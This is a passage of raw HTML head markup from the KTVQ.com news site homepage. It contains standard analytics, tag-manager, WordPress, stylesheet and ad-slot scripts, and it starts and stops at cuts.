u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Home - KTVQ.com</title> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ var gtm4wp_datalayer_name = "dataLayer"; var dataLayer = dataLayer || []; //]]> </script> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <!-- This site is optimized with the Yoast SEO plugin v9.0.2 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://ktvq.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - KTVQ.com" /> <meta property="og:description" content="Weather More News Watch Watch KTVQ Newscasts Latest Videos Newscasts Watch More Videos From KTVQ On KTVQ Trending News" /> <meta property="og:url" content="https://ktvq.com/" /> <meta property="og:site_name" content="KTVQ.com" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Weather More News Watch Watch KTVQ Newscasts Latest Videos Newscasts Watch More Videos From KTVQ On KTVQ Trending News" /> <meta name="twitter:title" content="Home - KTVQ.com" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/ktvq.com\/","name":"KTVQ.com","potentialAction":{"@type":"SearchAction","target":"https:\/\/ktvq.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="google-site-verification" content="q4mskKy-7icFVgsp9tJ8C79ytJiy6xRGOGLfpJgpkZE" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.googletagservices.com' /> <link rel='dns-prefetch' href='//cdn.jsdelivr.net' /> <link rel='dns-prefetch' href='//unpkg.com' /> <link rel='dns-prefetch' href='//ktvq.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="KTVQ.com &raquo; Feed" href="https://ktvq.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="KTVQ.com &raquo; Comments Feed" href="https://ktvq.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/ktvq.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.3"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://ktvq.com/wp-includes/css/dist/block-library/style.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-ads-styles-css' href='https://ktvq.com/wp-content/plugins/cordillera-ads/assets/css/ads.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-intra-articles-css' href='https://ktvq.com/wp-content/plugins/cordillera-intra-article-nav/assets/css/intra-articles.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-video-embed-css' href='https://ktvq.com/wp-content/plugins/cordillera-post-modification/assets/css/video-embed.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='wp-polls-css' href='https://ktvq.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.75.2' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('https://ktvq.com/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8; } </style> <link rel='stylesheet' id='cordillera-weather-icon-styles-css' href='https://ktvq.com/wp-content/plugins/cordillera-current-weather-conditions/assets/css/weather-icons.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='cordillera-current-conditions-styles-css' href='https://ktvq.com/wp-content/plugins/cordillera-current-weather-conditions/assets/css/current-conditions.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-a11y-css' href='https://ktvq.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://ktvq.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=3.6.0' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://ktvq.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-animations-css' href='https://ktvq.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=2.1.6' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://ktvq.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.1.6' type='text/css' media='all' /> <style id='elementor-frontend-inline-css' type='text/css'> /* Start custom CSS for wp-widget-ad_placement, class: .elementor-element-76d4497a */.elementor-672 .elementor-element.elementor-element-76d4497a { margin-top: 20px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-7b934a76 */.elementor-672 .elementor-element.elementor-element-7b934a76 h4.grid-heading { font-size: 30px; } .elementor-672 .elementor-element.elementor-element-7b934a76 .entry-meta { margin: -6px 0 -6px 0; } .elementor-672 .elementor-element.elementor-element-7b934a76 .entry-meta span { margin: 0 0 0 0; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-ff3220f */.elementor-672 .elementor-element.elementor-element-ff3220f .media-body { border-bottom: none; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-159f0f7c */.elementor-672 .elementor-element.elementor-element-159f0f7c h4.grid-heading { font-size: 21px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-59241428 */.elementor-672 .elementor-element.elementor-element-59241428 .media-heading { font-size: 16px; } .elementor-672 .elementor-element.elementor-element-59241428 .media-body { border-bottom: none; } .elementor-672 .elementor-element.elementor-element-59241428 .entry-meta { margin-top: -3px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-4dfac02 */.elementor-672 .elementor-element.elementor-element-4dfac02 .media-body { border-bottom: none; } .elementor-672 .elementor-element.elementor-element-4dfac02 .media-left { padding-right: 10px; } .elementor-672 .elementor-element.elementor-element-4dfac02 .media-heading { font-size: 16px; } .elementor-672 .elementor-element.elementor-element-4dfac02 .entry-meta { margin-top: -3px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-8355650 */.elementor-672 .elementor-element.elementor-element-8355650 .media-body { border-bottom: none; } .elementor-672 .elementor-element.elementor-element-8355650 .media-left { padding-right: 10px; } .elementor-672 .elementor-element.elementor-element-8355650 .media-heading { font-size: 16px; } .elementor-672 .elementor-element.elementor-element-8355650 .entry-meta { margin-top: -3px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-40f699cd */.elementor-672 .elementor-element.elementor-element-40f699cd .media-heading { font-size: 18px; } .elementor-672 .elementor-element.elementor-element-40f699cd .media-body { border-bottom: none; } .elementor-672 .elementor-element.elementor-element-40f699cd .entry-meta { margin-top: -3px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-3782642f */.elementor-672 .elementor-element.elementor-element-3782642f .media-heading { font-size: 18px; } .elementor-672 .elementor-element.elementor-element-3782642f .media-body { border-bottom: none; } .elementor-672 .elementor-element.elementor-element-3782642f .entry-meta { margin-top: -3px; }/* End custom CSS */ /* Start custom CSS for wp-widget-pojo_recent_posts, class: .elementor-element-23302194 */.elementor-672 .elementor-element.elementor-element-23302194 .media-heading { font-size: 18px; } .elementor-672 .elementor-element.elementor-element-23302194 .media-body { border-bottom: none; } .elementor-672 .elementor-element.elementor-element-23302194 .entry-meta { margin-top: -3px; }/* End custom CSS */ </style> <link rel='stylesheet' id='elementor-pro-css' href='https://ktvq.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=2.1.2' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-672-css' href='https://ktvq.com/wp-content/uploads/sites/6/elementor/css/post-672.css?ver=1545589774' type='text/css' media='all' /> <link rel='stylesheet' id='__EPYT__style-css' href='https://ktvq.com/wp-content/plugins/youtube-embed-plus-pro/styles/ytprefs.min.css?ver=12.0' type='text/css' media='all' /> <style id='__EPYT__style-inline-css' type='text/css'> .epyt-gallery-thumb { width: 33.333%; } </style> <link rel='stylesheet' id='__disptype__-css' href='https://ktvq.com/wp-content/plugins/youtube-embed-plus-pro/scripts/lity.min.css?ver=12.0' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-css-framework-css' href='https://ktvq.com/wp-content/themes/buzz/assets/bootstrap/css/bootstrap.min.css?ver=3.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='photoswipe-css' href='https://ktvq.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/photoswipe.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='photoswipe-skin-css' href='https://ktvq.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/default-skin/default-skin.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-base-style-css' href='https://ktvq.com/wp-content/themes/buzz/core/assets/css/style.min.css?ver=1.7.12' type='text/css' media='all' /> <link rel='stylesheet' id='pojo-style-css' href='https://ktvq.com/wp-content/themes/buzz-child/assets/css/style.css?ver=1.7.12' type='text/css' media='all' /> <script type='text/javascript' src='https://www.googletagservices.com/tag/js/gpt.js'></script> <script type='text/javascript' src='https://cdn.jsdelivr.net/npm/vue?ver=2.5.16'></script> <script type='text/javascript' src='https://unpkg.com/axios/dist/axios.min.js?ver=0.18.0'></script> <script type='text/javascript' src='https://ktvq.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://ktvq.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/cordillera-current-weather-conditions/assets/js/current-conditions.js'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9'></script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/youtube-embed-plus-pro/scripts/lity.min.js?ver=12.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var _EPYT_ = {"ajaxurl":"https:\/\/ktvq.com\/wp-admin\/admin-ajax.php","security":"8b53b3bb12","gallery_scrolloffset":"20","eppathtoscripts":"https:\/\/ktvq.com\/wp-content\/plugins\/youtube-embed-plus-pro\/scripts\/","epresponsiveselector":"[\"iframe.__youtube_prefs_widget__\"]","epdovol":"1","version":"12.0","evselector":"iframe.__youtube_prefs__[src], iframe[src*=\"youtube.com\/embed\/\"], iframe[src*=\"youtube-nocookie.com\/embed\/\"]","ajax_compat":"","ytapi_load":"light","stopMobileBuffer":"1","vi_active":"","vi_js_posttypes":[]}; /* ]]> */ </script> <script type='text/javascript' src='https://ktvq.com/wp-content/plugins/youtube-embed-plus-pro/scripts/ytprefs.min.js?ver=12.0'></script> <link rel='https://api.w.org/' href='https://ktvq.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ktvq.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://ktvq.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.0.3" /> <link rel='shortlink' href='https://ktvq.com/' /> <link rel="alternate" type="application/json+oembed" href="https://ktvq.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fktvq.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://ktvq.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fktvq.com%2F&#038;format=xml" /> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ dataLayer.push({"siteID":"6","siteName":"KTVQ.com","pageTitle":"Home - KTVQ.com","pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthorID":1,"pagePostAuthor":"Site Administrator"});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WXSM69Q');//]]> </script> <!-- End Google Tag Manager --> <!-- End Google Tag Manager for WordPress by gtm4wp.com --><link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic|Roboto:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic|Droid+Serif:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic"><style type="text/css">body{background-color: rgba(236, 240, 241, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;color: #212121; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 17px;line-height: 1.5em;}#primary{background-color: rgba(255, 255, 255, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;}button,.button,#commentform .button{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 15px;text-transform: uppercase;background-color: #e74c3c;border-color: #e74c3c;}button:hover,.button:hover,#commentform .button:hover{color: #e74c3c;background-color: #ffffff;border-color: #e74c3c;}div.logo-text a{color: #34495e; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 44px;line-height: 1em;}.logo{margin-top: 12px;margin-bottom: 0px;}#top-bar{background-color: rgba(57, 74, 107, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}#top-bar, #top-bar .widget-title{color: #ecf0f1; font-family: 'Roboto', Arial, sans-serif; font-weight: 400; font-size: 13px;text-transform: none;letter-spacing: 0px;font-style: normal;line-height: 45px;}#top-bar a{color: #ecf0f1;}#top-bar a:hover{color: #e74c3c;}#header, .sticky-header{background-color: rgba(26, 46, 102, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}.sf-menu a, .mobile-menu a{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 15px;text-transform: uppercase;letter-spacing: 0.5px;}.sf-menu a:hover,.sf-menu li.active a, .sf-menu li.current-menu-item > a,.sf-menu .sfHover > a,.sf-menu .sfHover > li.current-menu-item > a,.sf-menu li.current-menu-ancestor > a,.mobile-menu a:hover,.mobile-menu li.current-menu-item > a, a.search-toggle .fa-times{color: #e85c4c;}.nav-main .sf-menu .sub-menu{background-color: #0064a8;}.nav-main .sf-menu .sub-menu li:hover > a,.nav-main .sf-menu .sub-menu li.current-menu-item > a{background-color: #e85c4c;color: #ecf0f1;}.nav-main .sf-menu .sub-menu li a{color: #ecf0f1; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 14px;text-transform: none;line-height: 2em;}.search-section{background-color: rgba(255, 255, 255, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}.search-section,.search-section .form-search .field{color: #191919;}#sub-header{background-color: rgba(26, 46, 102, 1);background-position: top center;background-repeat: repeat-x;background-size: auto;background-attachment: scroll;}#sub-header, #sub-header .widget-title{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 12px;text-transform: none;letter-spacing: 0px;font-style: normal;line-height: 1.2em;}#sub-header a{color: #dedede;}#sub-header a:hover{color: #e74c3c;}#title-bar{height: 100px;line-height: 100px;color: #7f8c8d; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 17px;text-transform: uppercase;}#title-bar.title-bar-style-custom_bg{background-color: rgba(236, 240, 241, 1);background-position: center center;background-repeat: repeat;background-size: cover;background-attachment: scroll;}#title-bar div.breadcrumbs, #title-bar div.breadcrumbs a{color: #7f8c8d; font-family: 'Droid Serif', Arial, sans-serif; font-weight: normal; font-size: 12px;text-transform: none;letter-spacing: 0px;font-style: italic;}a{color: #4e8dc4;}a:hover, a:focus{color: #e74c3c;}::selection{color: #ffffff;background: #e74c3c;}::-moz-selection{color: #ffffff;background: #e74c3c;}h1{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 30px;text-transform: none;letter-spacing: -0.5px;font-style: normal;line-height: 1.2em;}h2{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 400; font-size: 32px;text-transform: none;font-style: normal;line-height: 1.2em;}h3{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 18px;text-transform: none;font-style: normal;line-height: 1.2em;}h4{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 17px;text-transform: none;font-style: normal;line-height: 1.2em;}h5{color: #7f8c8d; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 16px;text-transform: uppercase;font-style: normal;line-height: 1.2em;}h6{color: #e74c3c; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 17px;text-transform: none;font-style: normal;line-height: 1.2em;}h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 21px;text-transform: none;font-style: normal;line-height: 1.2em;}.media.list-two h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 16px;text-transform: none;font-style: normal;line-height: 1.2em;}.media.list-three h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 15px;text-transform: none;font-style: normal;line-height: 1.2em;}.media.list-format h3.media-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 27px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-one h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 18px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-two h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 18px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-three h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 18px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.grid-four h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 18px;text-transform: none;font-style: normal;line-height: 1.2em;}.grid-item.cover-item .caption .grid-heading,.grid-item.cover-item .caption .entry-meta span,.grid-item.cover-item .caption .entry-excerpt p,.grid-item.cover-item .caption .read-more{color: #ffffff;}.posts-group .featured-post h3.media-heading,.posts-group .featured-post h3.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 24px;text-transform: none;font-style: normal;line-height: 1.2em;}.posts-group h3.media-heading,.posts-group h4.grid-heading{color: #2c3e50; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 16px;text-transform: none;font-style: normal;line-height: 1.2em;}.entry-meta > span, .more-link span,.read-more{color: #95a5a6; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 12px;text-transform: none;font-style: normal;}.entry-post .entry-meta > span{color: #95a5a6; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 12px;text-transform: none;font-style: normal;line-height: 1em;}.entry-excerpt{color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 15px;text-transform: none;font-style: normal;line-height: 1.3em;}.entry-post .entry-excerpt{color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: bold; font-size: 17px;text-transform: none;font-style: italic;line-height: 20px;}.category-label{color: #ffffff; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 11px;text-transform: uppercase;font-style: normal;}#primary #breadcrumbs,#primary #breadcrumbs a, nav.post-navigation{color: #7f8c8d; font-family: 'Montserrat', Arial, sans-serif; font-weight: normal; font-size: 14px;text-transform: uppercase;font-style: normal;line-height: 1em;}#sidebar{color: #5e5e5e; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 15px;text-transform: none;font-style: normal;line-height: 1.5em;}#sidebar a{color: #5e5e5e;}#sidebar a:hover{color: #e74c3c;}#sidebar .widget-title{color: #7f8c8d; font-family: 'Montserrat', Arial, sans-serif; font-weight: bold; font-size: 15px;text-transform: uppercase;font-style: normal;line-height: 1;}#footer-widgets{background-color: rgba(49, 63, 102, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;color: #cccccc; font-family: 'Roboto', Arial, sans-serif; font-weight: normal; font-size: 15px;text-transform: none;font-style: normal;line-height: 1.3em;}#footer-widgets a{color: #ffffff;}#footer-widgets a:hover{color: #e74c3c;}#footer-widgets .widget-title{color: #acd0e0; font-family: 'Montserrat', Arial, sans-serif; font-weight: 500; font-size: 20px;text-transform: uppercase;font-style: normal;line-height: 2;}#footer-copyright{background-color: rgba(44, 62, 80, 1);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;color: #ecf0f1; font-family: 'Montserrat', Arial, sans-serif; font-weight: 600; font-size: 12px;text-transform: none;font-style: normal;line-height: 70px;}#footer-copyright a{color: #b7d5e8;}#footer-copyright a:hover{color: #ffffff;}#pojo-scroll-up{width: 50px;height: 50px;line-height: 50px;background-color: rgba(51, 51, 51, 0.6);background-position: top center;background-repeat: repeat;background-size: auto;background-attachment: scroll;}#pojo-scroll-up a{color: #eeeeee;}#footer-copyright .content-copyright{border-color: #2c3e50;}.sf-menu a, .menu-no-found,.sf-menu li.pojo-menu-search,.search-header{line-height: 20px;}.sf-menu li:hover ul, .sf-menu li.sfHover ul{top: 20px;}a.search-toggle{color: #ffffff;}.navbar-toggle{border-color: #ffffff;}.icon-bar{background-color: #ffffff;}#sub-header ul.social-links li a .social-icon:before{line-height: 1.2em;height: 1.2em;width: 1.2em;}</style> <style type="text/css"> #pojo-a11y-toolbar .pojo-a11y-toolbar-toggle a{ background-color: #4054b2; color: #ffffff;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay, #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay ul.pojo-a11y-toolbar-items.pojo-a11y-links{ border-color: #4054b2;} body.pojo-a11y-focusable a:focus{ outline-style: solid !important; outline-width: 1px !important; outline-color: #FF0000 !important;} #pojo-a11y-toolbar{ top: 55px !important;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay{ background-color: #ffffff;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay ul.pojo-a11y-toolbar-items li.pojo-a11y-toolbar-item a, #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay p.pojo-a11y-toolbar-title{ color: #000000;} #pojo-a11y-toolbar .pojo-a11y-toolbar-overlay ul.pojo-a11y-toolbar-items li.pojo-a11y-toolbar-item a.active{ background-color: #000000; color: #ffffff;} @media (max-width: 767px) { #pojo-a11y-toolbar { top: 50px !important; } }</style><link rel="icon" href="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2018/07/08142347/cropped-ktvq-site-icon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2018/07/08142347/cropped-ktvq-site-icon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2018/07/08142347/cropped-ktvq-site-icon-180x180.png" /> <meta name="msapplication-TileImage" content="https://s3.amazonaws.com/cordillera-network/wp-content/uploads/sites/6/2018/07/08142347/cropped-ktvq-site-icon-270x270.png" /> <style type="text/css" id="wp-custom-css"> .widget-inner { margin:10px 0 10px 0; } #menu-main-menu, #menu-sponsored-menu { margin-top: 48px; } .search-toggle { margin-top: 48px; } .sticky-header .search-toggle { margin-top: 0px; } .sf-menu li { padding: 0 12px 12px; } .sub-menu { margin-top: 4px; } #pojo-a11y-toolbar .pojo-a11y-toolbar-toggle a { padding: 6px; } .media-heading.entry-title { margin-bottom: 6px; -webkit-margin-after: 6px; } .entry-meta span { margin: 0 0 10px 0; } .recent-post { margin-bottom: 10px; } .recent-post.media { margin-top: 0; } .ad-leaderboard { max-width: 740px; margin: 0 auto 0 auto; padding: 0 10px 0 10px; } .image-link .category-label { background-color: #333; opacity: 0.7; } img { object-fit: cover; } .gform_body #field_1_2 { margin: -20px 0 -20px 0; padding: 0; } .gform_body #field_1_2 li { margin: 0; padding: 0; line-height: 12px; } .current-conditions .station-title { font-family: montserrat; font-size: 14px; font-weight: 500; line-height: 15px; } .breaking-news a { text-shadow: 1px 1px 2px #666; } #main.full-width .media.list-item .media-heading { margin: 0 0 9px 0; } figure.alignleft { padding: 10px 10px 10px 0; } figure.alignright { padding: 10px 0 10px 10px; } figure.aligncenter { padding: 0 0 10px 0; } .wp-caption-text { font-size: 14px; line-height: 16px; color: #666; margin-top: 3px; } </style> <script> var googletag = googletag || {}; // Empty ad behavior googletag.pubads().addEventListener('slotRenderEnded', function (event) { var elementId = event.slot.getSlotElementId(); var el = document.getElementById(elementId); var targetParentClass = 'elementor-widget-wp-widget-ad_placement'; if (event.isEmpty && el.classList.contains('div-gpt-widget')) { // Find parent element with targetParentClass while ((el = 